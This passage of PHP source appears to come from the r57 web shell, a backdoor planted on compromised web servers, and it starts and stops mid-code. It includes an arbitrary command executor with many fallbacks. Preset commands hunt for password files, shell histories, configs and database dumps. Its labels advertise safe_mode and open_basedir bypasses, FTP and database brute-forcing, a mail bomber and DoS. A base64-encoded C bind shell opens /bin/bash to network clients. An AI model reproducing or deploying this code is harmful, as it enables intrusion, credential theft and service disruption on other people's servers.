', 'tr_text43' => 'Dosya Duzenlemek icin', 'tr_butt10' => 'Kaydet', 'tr_text44' => 'Dosya degistirilmiyor ! YASAK ! Guvenlik Modu izin Vermiyor', 'tr_text45' => 'Dosya Kaydedildi', 'tr_text46' => 'PHP info Goster()', 'tr_text47' => 'Php.ini dosyasinda ki degiskenleri goster', 'tr_text48' => 'Temp dosylarini sil', 'tr_butt11' => 'Dosya Duzenle', 'tr_text49' => 'Server dan bu scripti sil', 'tr_text50' => 'CPU bilgisini incele', 'tr_text51' => 'Memory[hafiza] bilgisini incele]', 'tr_text52' => 'Metni Bul ', 'tr_text53' => 'Klasor Bul', 'tr_text54' => 'Dosyalarda ki Metni Bul', 'tr_butt12' => 'Bul', 'tr_text55' => 'Dosya Bul ', 'tr_text56' => 'Bulunmadi :( KeyCoder :)', 'tr_text57' => 'Olustur/Sil Dosya/Dizin ', 'tr_text58' => 'isim', 'tr_text59' => 'Dosya', 'tr_text60' => 'Dizin', 'tr_butt13' => 'Olustur/Sil', 'tr_text61' => 'Dosya Olustur', 'tr_text62' => 'Dizin Olustur', 'tr_text63' => 'Dosya Sil', 'tr_text64' => 'Dizin Sil', 'tr_text65' => 'Olustur', 'tr_text66' => 'Sil', 'tr_text67' => 'Chown/Chgrp/Chmod', 'tr_text68' => 'Uygula', 'tr_text69' => 'param1', 'tr_text70' => 'param2', 'tr_text71' => "Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...", 'tr_text72' => 'Metin Bul', 'tr_text73' => 'Klasor Bul', 'tr_text74' => 'Dosya Bul', 'tr_text75' => '* you can use regexp', 'tr_text76' => 'Metin Ara Dosyalarin icinde Arama Yoluyla', 'tr_text80' => 'Cesit', 'tr_text81' => 'Net', 'tr_text82' => 'Databases', 'tr_text83' => 'SQL Sorgusu Yap', 'tr_text84' => 'SQL Sorgusu', 'tr_text85' => 'Test bypass safe_mode with commands execute via MSSQL server', 'tr_text86' => 'Download files from server', 'tr_butt14' => 'Download', 'tr_text87' => 'Download files from remote ftp-server', 'tr_text88' => 'server:port', 'tr_text89' => 'File on ftp', 'tr_text90' => 'Transfer mode', 'tr_text91' => 'Archivation', 'tr_text92' => 'without arch.', 'tr_text93' => 'FTP', 'tr_text94' => 'FTP-bruteforce', 'tr_text95' => 'Users list', 'tr_text96' => 'Can\'t get users list', 'tr_text97' => 'checked: ', 'tr_text98' => 'success: ', 'tr_text99' => '/etc/passwd', 'tr_text100' => 'Send file to remote ftp server', 'tr_text101' => 'Use reverse (user -> resu)', 'tr_text102' => 'Mail', 'tr_text103' => 'Send email', 'tr_text104' => 'Send file to email', 'tr_text105' => 'To', 'tr_text106' => 'From', 'tr_text107' => 'Subj', 'tr_butt15' => 'Send', 'tr_text108' => 'Mail', 'tr_text109' => 'Hide', 'tr_text110' => 'Show', 'tr_text111' => 'SQL-Server : Port', 'tr_text112' => 'Test bypass safe_mode with function mb_send_mail (PHP <= 4.0-4.2.2, 5.x)', 'tr_text113' => 'Test bypass safe_mode, view dir list via imap_list (PHP <= 5.1.2)', 'tr_text114' => 'Test bypass safe_mode, view file contest via imap_body (PHP <= 5.1.2)', 'tr_text115' => 'Test bypass safe_mode, copy file via copy[compress.zlib://] (PHP <= 4.4.2, 5.1.2)', 'tr_text116' => 'Copy from', 'tr_text117' => 'to', 'tr_text118' => 'File copied', 'tr_text119' => 'Cant copy file', 'tr_text120' => 'Test bypass safe_mode via ini_restore (PHP <= 4.4.4, 5.1.6) by NST', 'tr_text121' => 'Test bypass open_basedir, view dir list via fopen (PHP v4.4.0 memory leak) by NST', 'tr_text122' => 'Test bypass open_basedir, view dir list via glob (PHP <= 5.2.x)', 'tr_text123' => 'Test bypass open_basedir, read *.bzip file via [compress.bzip2://] (PHP <= 5.2.1)', 'tr_text124' => 'Test bypass open_basedir, add data to file via error_log[php://] (PHP <= 5.1.4, 4.4.2)', 'tr_text125' => 'Data', 'tr_text126' => 'Test bypass open_basedir, create file via session_save_path[NULL-byte] (PHP <= 5.2.0)', 'tr_text127' => 'Test bypass open_basedir, add data to file via readfile[php://] (PHP <= 5.2.1, 4.4.4)', 'tr_text128' => 'Modify/Access date(touch)', 'tr_text129' => 'Test bypass open_basedir, create file via fopen[srpath://] (PHP v5.2.0)', 'tr_text130' => 'Test bypass open_basedir, read *.zip file via [zip://] (PHP <= 5.2.1)', 'tr_text131' => 'Test bypass open_basedir, view file contest via symlink() (PHP <= 5.2.1)', 'tr_text132' => 'Test bypass open_basedir, view dir list via symlink() (PHP <= 5.2.1)', 'tr_text133' => '', 'tr_text134' => 'Database-bruteforce', 'tr_text135' => 'Dictionary', 'tr_text136' => 'Creating evil symlink', 'tr_text137' => 'Useful', 'tr_text138' => 'Dangerous', 'tr_text139' => 'Mail Bomber', 'tr_text140' => 'DoS', 'tr_text141' => 'Danger! Web-daemon crash possible.', 'tr_err0' => 'Error! Can\'t write in file ', 'tr_err1' => 'Error! Can\'t read file ', 'tr_err2' => 'Error! Can\'t create ', 'tr_err3' => 'Error! Can\'t connect to ftp', 'tr_err4' => 'Error! Can\'t login on ftp server', 'tr_err5' => 'Error! Can\'t change dir on ftp', 'tr_err6' => 'Error! Can\'t sent mail', 'tr_err7' => 'Mail send',);
                    $aliases = array('----------------------------------locate' => '', 'locate httpd.conf files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'locate httpd.conf >> /tmp/grep.txt;cat /tmp/grep.txt', 'locate vhosts.conf files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'locate vhosts.conf >> /tmp/grep.txt;cat /tmp/grep.txt', 'locate proftpd.conf files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'locate proftpd.conf >> /tmp/grep.txt;cat /tmp/grep.txt', 'locate psybnc.conf >> /tmp/grep.txt;cat /tmp/grep.txt' => 'locate psybnc.conf >> /tmp/grep.txt;cat /tmp/grep.txt', 'locate my.conf files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'locate my.conf >> /tmp/grep.txt;cat /tmp/grep.txt', 'locate admin.php files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'locate admin.php >> /tmp/grep.txt;cat /tmp/grep.txt', 'locate cfg.php files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'locate cfg.php >> /tmp/grep.txt;cat /tmp/grep.txt', 'locate conf.php files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'locate conf.php >> /tmp/grep.txt;cat /tmp/grep.txt', 'locate config.dat files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'locate config.dat >> /tmp/grep.txt;cat /tmp/grep.txt', 'locate config.php files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'locate config.php >> /tmp/grep.txt;cat /tmp/grep.txt', 'locate config.inc files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'locate config.inc >> /tmp/grep.txt;cat /tmp/grep.txt', 'locate config.inc.php files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'locate config.inc.php >> /tmp/grep.txt;cat /tmp/grep.txt', 'locate config.default.php files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'locate config.default.php >> /tmp/grep.txt;cat /tmp/grep.txt', 'locate .conf files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'locate ".conf" >> /tmp/grep.txt;cat /tmp/grep.txt', 'locate .pwd files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'locate ".pwd" >> /tmp/grep.txt;cat /tmp/grep.txt', 'locate .sql files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'locate ".sql" >> /tmp/grep.txt;cat /tmp/grep.txt', 'locate .htpasswd files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'locate ".htpasswd" >> /tmp/grep.txt;cat /tmp/grep.txt', 'locate .bash_history files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'locate ".bash_history" >> /tmp/grep.txt;cat /tmp/grep.txt', 'locate .mysql_history files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'locate ".mysql_history" >> /tmp/grep.txt;cat /tmp/grep.txt', 'locate backup files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'locate backup >> /tmp/grep.txt;cat /tmp/grep.txt', 'locate dump files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'locate dump >> /tmp/grep.txt;cat /tmp/grep.txt', 'locate priv files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'locate priv >> /tmp/grep.txt;cat /tmp/grep.txt', '----------------------------------tar' => '', 'tar -czvf all.tgz -T /tmp/grep.txt' => 'tar -czvf all.tgz -T /tmp/grep.txt', '----------------------------------1' => '', 'locate access_log files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'locate access_log >> /tmp/grep.txt;cat /tmp/grep.txt', 'locate error_log files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'locate error_log >> /tmp/grep.txt;cat /tmp/grep.txt', 'locate access.log files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'locate access.log >> /tmp/grep.txt;cat /tmp/grep.txt', 'locate error.log files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'locate error.log >> /tmp/grep.txt;cat /tmp/grep.txt', 'locate ".log" files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'locate ".log" >> /tmp/grep.txt;cat /tmp/grep.txt', '----------------------------------2' => '', 'cat /var/log/httpd/access_log | grep pass >> /tmp/grep.txt;cat /tmp/grep.txt' => 'cat /var/log/httpd/access_log | grep pass >> /tmp/grep.txt', '----------------------------------find' => '', 'find suid files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'find / -type f -perm -04000 -ls  >> /tmp/grep.txt;cat /tmp/grep.txt', 'find suid files in current dir >> /tmp/grep.txt;cat /tmp/grep.txt' => 'find . -type f -perm -04000 -ls  >> /tmp/grep.txt;cat /tmp/grep.txt', 'find sgid files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'find / -type f -perm -02000 -ls  >> /tmp/grep.txt;cat /tmp/grep.txt', 'find sgid files in current dir >> /tmp/grep.txt;cat /tmp/grep.txt' => 'find . -type f -perm -02000 -ls  >> /tmp/grep.txt;cat /tmp/grep.txt', 'find all writable files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'find / -type f -perm -2 -ls  >> /tmp/grep.txt;cat /tmp/grep.txt', 'find all writable files in current dir >> /tmp/grep.txt;cat /tmp/grep.txt' => 'find . -type f -perm -2 -ls  >> /tmp/grep.txt;cat /tmp/grep.txt', 'find all writable directories >> /tmp/grep.txt;cat /tmp/grep.txt' => 'find /  -type d -perm -2 -ls  >> /tmp/grep.txt;cat /tmp/grep.txt', 'find all writable directories in current dir >> /tmp/grep.txt;cat /tmp/grep.txt' => 'find . -type d -perm -2 -ls  >> /tmp/grep.txt;cat /tmp/grep.txt', 'find all writable directories and files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'find / -perm -2 -ls  >> /tmp/grep.txt;cat /tmp/grep.txt', 'find all writable directories and files in current dir >> /tmp/grep.txt;cat /tmp/grep.txt' => 'find . -perm -2 -ls  >> /tmp/grep.txt;cat /tmp/grep.txt', 'find all .htpasswd files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'find / -type f -name .htpasswd  >> /tmp/grep.txt;cat /tmp/grep.txt', 'find all .bash_history files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'find / -type f -name .bash_history  >> /tmp/grep.txt;cat /tmp/grep.txt', 'find all .mysql_history files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'find / -type f -name .mysql_history  >> /tmp/grep.txt;cat /tmp/grep.txt', 'find all .fetchmailrc files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'find / -type f -name .fetchmailrc  >> /tmp/grep.txt;cat /tmp/grep.txt', 'find httpd.conf files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'find / -type f -name httpd.conf >> /tmp/grep.txt;cat /tmp/grep.txt', 'find vhosts.conf files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'find / -type f -name vhosts.conf >> /tmp/grep.txt;cat /tmp/grep.txt', 'find proftpd.conf files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'find / -type f -name proftpd.conf >> /tmp/grep.txt;cat /tmp/grep.txt', 'find admin.php files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'find / -type f -name admin.php >> /tmp/grep.txt;cat /tmp/grep.txt', 'find config* files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'find / -type f -name "config*"  >> /tmp/grep.txt;cat /tmp/grep.txt', 'find cfg.php files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'find / -type f -name cfg.php >> /tmp/grep.txt;cat /tmp/grep.txt', 'find conf.php files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'find / -type f -name conf.php >> /tmp/grep.txt;cat /tmp/grep.txt', 'find config.dat files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'find / -type f -name config.dat >> /tmp/grep.txt;cat /tmp/grep.txt', 'find config.php files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'find / -type f -name config.php >> /tmp/grep.txt;cat /tmp/grep.txt', 'find config.inc files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'find / -type f -name config.inc >> /tmp/grep.txt;cat /tmp/grep.txt', 'find config.inc.php files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'find / -type f -name config.inc.php >> /tmp/grep.txt;cat /tmp/grep.txt', 'find config.default.php files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'find / -type f -name config.default.php >> /tmp/grep.txt;cat /tmp/grep.txt', 'find *.conf files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'find / -type f -name "*.conf" >> /tmp/grep.txt;cat /tmp/grep.txt', 'find *.pwd files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'find / -type f -name "*.pwd" >> /tmp/grep.txt;cat /tmp/grep.txt', 'find *.sql files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'find / -type f -name "*.sql" >> /tmp/grep.txt;cat /tmp/grep.txt', 'find *backup* files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'find / -type f -name "*backup*" >> /tmp/grep.txt;cat /tmp/grep.txt', 'find *dump* files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'find / -type f -name "*dump*" >> /tmp/grep.txt;cat /tmp/grep.txt', '-----------------------------------' => '', 'find /var/ access_log files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'find /var/ -type f -name access_log >> /tmp/grep.txt;cat /tmp/grep.txt', 'find /var/ error_log files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'find /var/ -type f -name error_log >> /tmp/grep.txt;cat /tmp/grep.txt', 'find /var/ access.log files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'find /var/ -type f -name access.log >> /tmp/grep.txt;cat /tmp/grep.txt', 'find /var/ error.log files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'find /var/ -type f -name error.log >> /tmp/grep.txt;cat /tmp/grep.txt', 'find /var/ "*.log" files >> /tmp/grep.txt;cat /tmp/grep.txt' => 'find /var/ -type f -name "*.log" >> /tmp/grep.txt;cat /tmp/grep.txt', '----------------------------------------------------------------------------------------------------' => 'ls -la');
                    $table_up1 = "<tr><td bgcolor=#333333><font face=Verdana size=-2><b><div align=center>:: ";
                    $table_up2 = " ::</div></b></font></td></tr><tr><td>";
                    $table_up3 = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#008000><tr><td bgcolor=#333333>";
                    $table_end1 = "</td></tr>";
                    $arrow = " <font face=Webdings color=gray>4</font>";
                    $lb = "<font color=green>[</font>";
                    $rb = "<font color=green>]</font>";
                    $font = "<font face=Verdana size=-2>";
                    $ts = "<table class=table1 width=100% align=center>";
                    $te = "</table>";
                    $fs = "<form name=form method=POST>";
                    $fe = "</form>";
                    if (isset($_GET['users'])) {
                        if (!$users = get_users('/etc/passwd')) {
                            echo "<center><font face=Verdana size=-2 color=red>" . $lang[$language . '_text96'] . "</font></center>";
                        } else {
                            echo '<center>';
                            foreach ($users as $user) {
                                echo $user . "<br>";
                            }
                            echo '</center>';
                        }
                        echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=" . $_SERVER['PHP_SELF'] . ">BACK</a> ]</b></font></div>";
                        die();
                    }
                    if (!empty($_POST['dir'])) {
                        if (@function_exists('chdir')) {
                            @chdir($_POST['dir']);
                        } else if (@function_exists('chroot')) {
                            @chroot($_POST['dir']);
                        };
                    }
                    if (empty($_POST['dir'])) {
                        if (@function_exists('chdir')) {
                            $dir = @getcwd();
                        };
                    } else {
                        $dir = $_POST['dir'];
                    }
                    $unix = 0;
                    if (strlen($dir) > 1 && $dir[1] == ":") $unix = 0;
                    else $unix = 1;
                    if (empty($dir)) {
                        $os = getenv('OS');
                        if (empty($os)) {
                            $os = @php_uname();
                        }
                        if (empty($os)) {
                            $os = "-";
                            $unix = 1;
                        } else {
                            if (@eregi("^win", $os)) {
                                $unix = 0;
                            } else {
                                $unix = 1;
                            }
                        }
                    }
                    if (!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text") {
                        echo $head;
                        if (!empty($_POST['s_mask']) && !empty($_POST['m'])) {
                            $sr = new SearchResult($_POST['s_dir'], $_POST['s_text'], $_POST['s_mask']);
                        } else {
                            $sr = new SearchResult($_POST['s_dir'], $_POST['s_text']);
                        }
                        $sr->SearchText(0, 0);
                        $res = $sr->GetResultFiles();
                        $found = $sr->GetMatchesCount();
                        $titles = $sr->GetTitles();
                        $r = "";
                        if ($found > 0) {
                            $r.= "<TABLE width=100%>";
                            foreach ($res as $file => $v) {
                                $r.= "<TR>";
                                $r.= "<TD colspan=2><font face=Verdana size=-2><b>" . ws(3);
                                $r.= (!$unix) ? str_replace("/", "\\", $file) : $file;
                                $r.= "</b></font></ TD>";
                                $r.= "</TR>";
                                foreach ($v as $a => $b) {
                                    $r.= "<TR>";
                                    $r.= "<TD align=center><B><font face=Verdana size=-2>" . $a . "</font></B></TD>";
                                    $r.= "<TD><font face=Verdana size=-2>" . ws(2) . $b . "</font></TD>";
                                    $r.= "</TR>\n";
                                }
                            }
                            $r.= "</TABLE>";
                            echo $r;
                        } else {
                            echo "<P align=center><B><font face=Verdana size=-2>" . $lang[$language . '_text56'] . "</B></font></P>";
                        }
                        echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=" . $_SERVER['PHP_SELF'] . ">BACK</a> ]</b></font></div>";
                        die();
                    }
                    if (!$safe_mode && strpos(ex("echo abcr57"), "r57") != 3) {
                        $safe_mode = 1;
                    }
                    $SERVER_SOFTWARE = getenv('SERVER_SOFTWARE');
                    if (empty($SERVER_SOFTWARE)) {
                        $SERVER_SOFTWARE = "-";
                    }
                    function ws($i) {
                        return @str_repeat("&nbsp;", $i);
                    }
                    function ex($cfe) {
                        $res = '';
                        if (!empty($cfe)) {
                            if (@function_exists('exec')) {
                                @exec($cfe, $res);
                                $res = join("\n", $res);
                            } elseif (@function_exists('shell_exec')) {
                                $res = @shell_exec($cfe);
                            } elseif (@function_exists('system')) {
                                @ob_start();
                                @system($cfe);
                                $res = @ob_get_contents();
                                @ob_end_clean();
                            } elseif (@function_exists('passthru')) {
                                @ob_start();
                                @passthru($cfe);
                                $res = @ob_get_contents();
                                @ob_end_clean();
                            } elseif (@is_resource($f = @popen($cfe, "r"))) {
                                $res = "";
                                if (@function_exists('fread') && @function_exists('feof')) {
                                    while (!@feof($f)) {
                                        $res.= @fread($f, 1024);
                                    }
                                } else if (@function_exists('fgets') && @function_exists('feof')) {
                                    while (!@feof($f)) {
                                        $res.= @fgets($f, 1024);
                                    }
                                }
                                @pclose($f);
                            } elseif (@is_resource($f = @proc_open($cfe, array(1 => array("pipe", "w")), $pipes))) {
                                $res = "";
                                if (@function_exists('fread') && @function_exists('feof')) {
                                    while (!@feof($pipes[1])) {
                                        $res.= @fread($pipes[1], 1024);
                                    }
                                } else if (@function_exists('fgets') && @function_exists('feof')) {
                                    while (!@feof($pipes[1])) {
                                        $res.= @fgets($pipes[1], 1024);
                                    }
                                }
                                @proc_close($f);
                            } elseif (@function_exists('pcntl_exec') && @function_exists('pcntl_fork')) {
                                $res = '[~] Blind Command Execution via [pcntl_exec]\n\n';
                                $pid = @pcntl_fork();
                                if ($pid == - 1) {
                                    $res.= '[-] Could not children fork. Exit';
                                } else if ($pid) {
                                    if (@pcntl_wifexited($status)) {
                                        $res.= '[+] Done! Command "' . $cfe . '" successfully executed.';
                                    } else {
                                        $res.= '[-] Error. Command incorrect.';
                                    }
                                } else {
                                    $cfe = array(" -e 'system(\"$cfe\")'");
                                    if (@pcntl_exec('/usr/bin/perl', $cfe)) exit(0);
                                    if (@pcntl_exec('/usr/local/bin/perl', $cfe)) exit(0);
                                    die();
                                }
                            }
                        }
                        return $res;
                    }
                    function get_users($filename) {
                        $users = array();
                        $rows = @explode("\n", readzlib($filename));
                        if (!$rows) return 0;
                        foreach ($rows as $string) {
                            $user = @explode(":", trim($string));
                            if (substr($string, 0, 1) != '#') array_push($users, $user[0]);
                        }
                        return $users;
                    }
                    function err($n, $txt = '') {
                        echo '<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#333333><font color=red face=Verdana size=-2><div align=center><b>';
                        echo $GLOBALS['lang'][$GLOBALS['language'] . '_err' . $n];
                        if (!empty($txt)) {
                            echo " $txt";
                        }
                        echo '</b></div></font></td></tr></table>';
                        return null;
                    }
                    function perms($mode) {
                        if (!$GLOBALS['unix']) return 0;
                        if ($mode & 0x1000) {
                            $type = 'p';
                        } else if ($mode & 0x2000) {
                            $type = 'c';
                        } else if ($mode & 0x4000) {
                            $type = 'd';
                        } else if ($mode & 0x6000) {
                            $type = 'b';
                        } else if ($mode & 0x8000) {
                            $type = '-';
                        } else if ($mode & 0xA000) {
                            $type = 'l';
                        } else if ($mode & 0xC000) {
                            $type = 's';
                        } else $type = 'u';
                        $owner["read"] = ($mode & 00400) ? 'r' : '-';
                        $owner["write"] = ($mode & 00200) ? 'w' : '-';
                        $owner["execute"] = ($mode & 00100) ? 'x' : '-';
                        $group["read"] = ($mode & 00040) ? 'r' : '-';
                        $group["write"] = ($mode & 00020) ? 'w' : '-';
                        $group["execute"] = ($mode & 00010) ? 'x' : '-';
                        $world["read"] = ($mode & 00004) ? 'r' : '-';
                        $world["write"] = ($mode & 00002) ? 'w' : '-';
                        $world["execute"] = ($mode & 00001) ? 'x' : '-';
                        if ($mode & 0x800) $owner["execute"] = ($owner['execute'] == 'x') ? 's' : 'S';
                        if ($mode & 0x400) $group["execute"] = ($group['execute'] == 'x') ? 's' : 'S';
                        if ($mode & 0x200) $world["execute"] = ($world['execute'] == 'x') ? 't' : 'T';
                        $s = sprintf("%1s", $type);
                        $s.= sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
                        $s.= sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
                        $s.= sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
                        return trim($s);
                    }
                    function in($type, $name, $size, $value, $checked = 0) {
                        $ret = "<input type=" . $type . " name=" . $name . " ";
                        if ($size != 0) {
                            $ret.= "size=" . $size . " ";
                        }
                        $ret.= "value=\"" . $value . "\"";
                        if ($checked) $ret.= " checked";
                        return $ret . ">";
                    }
                    function which($pr) {
                        $path = '';
                        $path = ex("which $pr");
                        if (!empty($path)) {
                            return $path;
                        } else {
                            return false;
                        }
                    }
                    function cf($fname, $text) {
                        $w_file = @fopen($fname, "w") or @function_exists('file_put_contents') or err(0);
                        if ($w_file) {
                            @fwrite($w_file, base64_decode($text)) or @fputs($w_file, base64_decode($text)) or @file_put_contents($fname, base64_decode($text));
                            @fclose($w_file);
                        }
                    }
                    function sr($l, $t1, $t2) {
                        return "<tr class=tr1><td class=td1 width=" . $l . "% align=right>" . $t1 . "</td><td class=td1 align=left>" . $t2 . "</td></tr>";
                    }
                    if (!@function_exists("view_size")) {
                        function view_size($size) {
                            if ($size >= 1073741824) {
                                $size = @round($size / 1073741824 * 100) / 100 . " GB";
                            } elseif ($size >= 1048576) {
                                $size = @round($size / 1048576 * 100) / 100 . " MB";
                            } elseif ($size >= 1024) {
                                $size = @round($size / 1024 * 100) / 100 . " KB";
                            } else {
                                $size = $size . " B";
                            }
                            return $size;
                        }
                    }
                    function DirFilesR($dir, $types = '') {
                        $files = Array();
                        if (($handle = @opendir($dir)) || (@function_exists('scandir'))) {
                            while ((false !== ($file = @readdir($handle))) && (false !== ($file = @scandir($dir)))) {
                                if ($file != "." && $file != "..") {
                                    if (@is_dir($dir . "/" . $file)) $files = @array_merge($files, DirFilesR($dir . "/" . $file, $types));
                                    else {
                                        $pos = @strrpos($file, ".");
                                        $ext = @substr($file, $pos, @strlen($file) - $pos);
                                        if ($types) {
                                            if (@in_array($ext, explode(';', $types))) $files[] = $dir . "/" . $file;
                                        } else $files[] = $dir . "/" . $file;
                                    }
                                }
                            }
                            @closedir($handle);
                        }
                        return $files;
                    }
                    class SearchResult {
                        var $text;
                        var $FilesToSearch;
                        var $ResultFiles;
                        var $FilesTotal;
                        var $MatchesCount;
                        var $FileMatschesCount;
                        var $TimeStart;
                        var $TimeTotal;
                        var $titles;
                        function SearchResult($dir, $text, $filter = '') {
                            $dirs = @explode(";", $dir);
                            $this->FilesToSearch = Array();
                            for ($a = 0;$a < count($dirs);$a++) $this->FilesToSearch = @array_merge($this->FilesToSearch, DirFilesR($dirs[$a], $filter));
                            $this->text = $text;
                            $this->FilesTotal = @count($this->FilesToSearch);
                            $this->TimeStart = getmicrotime();
                            $this->MatchesCount = 0;
                            $this->ResultFiles = Array();
                            $this->FileMatchesCount = Array();
                            $this->titles = Array();
                        }
                        function GetFilesTotal() {
                            return $this->FilesTotal;
                        }
                        function GetTitles() {
                            return $this->titles;
                        }
                        function GetTimeTotal() {
                            return $this->TimeTotal;
                        }
                        function GetMatchesCount() {
                            return $this->MatchesCount;
                        }
                        function GetFileMatchesCount() {
                            return $this->FileMatchesCount;
                        }
                        function GetResultFiles() {
                            return $this->ResultFiles;
                        }
                        function SearchText($phrase = 0, $case = 0) {
                            $qq = @explode(' ', $this->text);
                            $delim = '|';
                            if ($phrase) foreach ($qq as $k => $v) $qq[$k] = '\b' . $v . '\b';
                            $words = '(' . @implode($delim, $qq) . ')';
                            $pattern = "/" . $words . "/";
                            if (!$case) $pattern.= 'i';
                            foreach ($this->FilesToSearch as $k => $filename) {
                                $this->FileMatchesCount[$filename] = 0;
                                $FileStrings = @file($filename) or @next;
                                for ($a = 0;$a < @count($FileStrings);$a++) {
                                    $count = 0;
                                    $CurString = $FileStrings[$a];
                                    $CurString = @Trim($CurString);
                                    $CurString = @strip_tags($CurString);
                                    $aa = '';
                                    if (($count = @preg_match_all($pattern, $CurString, $aa))) {
                                        $CurString = @preg_replace($pattern, "<SPAN style='color: #990000;'><b>\\1</b></SPAN>", $CurString);
                                        $this->ResultFiles[$filename][$a + 1] = $CurString;
                                        $this->MatchesCount+= $count;
                                        $this->FileMatchesCount[$filename]+= $count;
                                    }
                                }
                            }
                            $this->TimeTotal = @round(getmicrotime() - $this->TimeStart, 4);
                        }
                    }
                    function getmicrotime() {
                        list($usec, $sec) = @explode(" ", @microtime());
                        return ((float)$usec + (float)$sec);
                    }
                    $port_bind_bd_c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
